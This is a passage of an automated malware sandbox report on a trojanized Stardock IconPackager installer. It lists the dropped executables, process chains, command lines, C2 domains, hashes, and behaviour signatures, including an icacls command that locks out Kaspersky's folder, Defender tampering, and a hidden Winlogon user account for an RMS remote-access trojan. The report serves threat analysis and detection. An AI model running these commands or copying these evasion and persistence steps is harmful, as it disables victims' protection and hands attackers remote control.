icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:39

Platform

win10v2004-20220414-en

Max time kernel

164s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

RMS

trojan rat rms

Windows security bypass

evasion trojan

Blocks application from running via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3684 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 3684 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 3928 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 4744 wrote to memory of 4580 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 4580 wrote to memory of 4084 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 4580 wrote to memory of 2412 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4084 wrote to memory of 4836 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 wrote to memory of 4484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4744 wrote to memory of 308 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 4836 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin -ptoptorrent

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 13.89.178.27:443 tcp
NL 88.221.144.179:80 tcp
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 8.8.8.8:53 6.9.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.3.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa udp

Files

memory/3928-130-0x0000000000000000-mapping.dmp

memory/4592-131-0x0000000000000000-mapping.dmp

memory/4744-132-0x0000000000000000-mapping.dmp

C:\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

memory/4580-135-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

memory/4084-138-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

memory/2412-139-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

memory/4836-144-0x0000000000000000-mapping.dmp

memory/4484-145-0x0000000000000000-mapping.dmp

C:\ProgramData\install\cheat.exe

MD5 56bf27304cf61f949f8842b8558ff2e3
SHA1 c52809302addbcd57000dc142ac4193460e91c6f
SHA256 3cc93cac7905c81a4419f328183e508c6742a359788043c7e3faba6e406795a4
SHA512 48aefb4b6fec6961dc8836686ad34aa8a4dd36720a09632e7a2fbc723c9132428d835c1630b06936a5065e2c79167bd4302c045d5f4ada7516660166708fa95e

memory/308-146-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg1.reg

MD5 4dc0fba4595ad8fe1f010f9079f59dd3
SHA1 b3a54e99afc124c64978d48afca2544d75e69da5
SHA256 b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512 fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8

C:\programdata\install\cheat.exe

MD5 ffb4918a5d12cb7ae2c77aa77853cfc1
SHA1 7271dde96598c1ea1f80fe22c0d1a91a1a140f22
SHA256 be4fca209d665da7360c50ad346e2c0bb30855d2ec1e70dea34c5809b6502b56
SHA512 6d85d44cc90af2fc049b59e45dd5cb57813944a4b1940d86da04afaa09c8030cdce3f7a0e4343f5dfe7e5868a6eabcc12695f5d9fe7f1fa7401808fbf1396d52

memory/3256-150-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Analysis: behavioral3

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win7-20220414-en

Max time kernel

11s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Network

N/A

Files

memory/1728-54-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win10v2004-20220414-en

Max time kernel

203s

Max time network

230s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Network

Country Destination Domain Proto
NL 104.97.14.81:80 tcp
NL 20.50.201.200:443 tcp
IE 20.54.110.249:443 tcp
NL 87.248.202.1:80 tcp
NL 20.190.160.73:443 tcp
US 8.253.135.112:80 tcp
NL 20.190.160.67:443 tcp
FR 2.18.109.224:443 tcp
NL 20.190.160.2:443 tcp
NL 20.190.160.136:443 tcp
NL 20.190.160.129:443 tcp
NL 20.190.160.6:443 tcp
US 8.8.8.8:53 106.89.54.20.in-addr.arpa udp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
NL 20.190.160.8:443 tcp
NL 20.190.160.4:443 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win7-20220414-en

Max time kernel

147s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Network

N/A

Files

memory/1064-54-0x00000000769D1000-0x00000000769D3000-memory.dmp